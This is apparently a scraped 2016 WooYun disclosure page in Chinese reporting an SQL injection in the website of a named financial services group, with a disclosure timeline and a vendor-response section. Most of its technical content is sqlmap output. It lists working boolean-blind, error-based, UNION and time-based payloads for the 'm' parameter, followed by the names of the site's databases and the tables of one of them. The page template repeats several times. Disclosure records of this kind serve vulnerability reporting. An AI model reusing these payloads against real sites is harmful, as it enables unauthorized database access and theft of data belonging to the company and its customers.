尚诺集团主站存在SQL注入漏洞 | wooyun-2016-0166006| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166006

漏洞标题：尚诺集团主站存在SQL注入漏洞

漏洞作者：路人甲

提交时间：2016-01-02 21:56

修复时间：2016-02-22 20:58

公开时间：2016-02-22 20:58

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-02：细节已通知厂商并且等待厂商处理中
2016-01-08：厂商已经确认，细节仅向厂商公开
2016-01-18：细节向核心白帽子及相关领域专家公开
2016-01-28：细节向普通白帽子公开
2016-02-07：细节向实习白帽子公开
2016-02-22：细节向公众公开

简要描述：

尚诺集团创立于2004年，是国际著名的软银基金投资的一家专注于个人消费金融、小微金融和资产及财富管理的综合金融服务集团。
　　集团业务涉及融资性担保、供应链金融、支付金融、资产管理、高端财富管理、互联网金融产品搜索、移动金融等，拥有融担、保理、金融信息等政府特许的服务性牌照。
　　集团总部设在北京，在北京、上海、广州、深圳、青岛、沈阳等设有子公司，在香港、美国加州设有办事处。

详细说明：

http://**.**.**.**/table.php?m=03&y=2014

---
Parameter: m (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: m=03 AND 2671=2671&y=2014
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: m=03 AND (SELECT 3058 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (CASE WHEN (3058=3058) THEN 1 ELSE 0 END)),0x71626a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&y=2014
    Type: UNION query
    Title: MySQL UNION query (NULL) - 17 columns
    Payload: m=03 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b767171,0x6a546b684d5662456e4e,0x71626a6271),NULL,NULL,NULL,NULL,NULL,NULL#&y=2014
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: m=-5012 OR 3339=SLEEP(5)&y=2014
---
[03:19:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.13
back-end DBMS: MySQL 5.0

漏洞证明：

web application technology: PHP 5.2.13
back-end DBMS: MySQL >= 5.0.0
[03:20:00] [INFO] fetching database names
available databases [6]:
[*] bdm0110016_db
[*] information_schema
[*] mysql
[*] shangnuo
[*] sinocredit
[*] test

Database: sinocredit
[23 tables]
+---------------------+
| wurenet_about       |
| wurenet_abouttype   |
| wurenet_admin       |
| wurenet_apply       |
| wurenet_area        |
| wurenet_banner      |
| wurenet_bannertype  |
| wurenet_caidantype  |
| wurenet_down        |
| wurenet_downtype    |
| wurenet_file        |
| wurenet_job         |
| wurenet_jobtype     |
| wurenet_lanmu       |
| wurenet_news        |
| wurenet_newstype    |
| wurenet_order       |
| wurenet_other       |
| wurenet_othertype   |
| wurenet_product     |
| wurenet_producttype |
| wurenet_set         |
| wurenet_site        |
+---------------------+

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-01-08 21:25

厂商回复：

CNVD确认所述漏洞情况，暂未建立与网站管理单位的直接处置渠道，待认领。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166006

漏洞标题：尚诺集团主站存在SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2016-01-02 21:56

修复时间：2016-02-22 20:58

公开时间：2016-02-22 20:58

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166006

漏洞标题：尚诺集团主站存在SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2016-01-02 21:56

修复时间：2016-02-22 20:58

公开时间：2016-02-22 20:58

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0166006"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云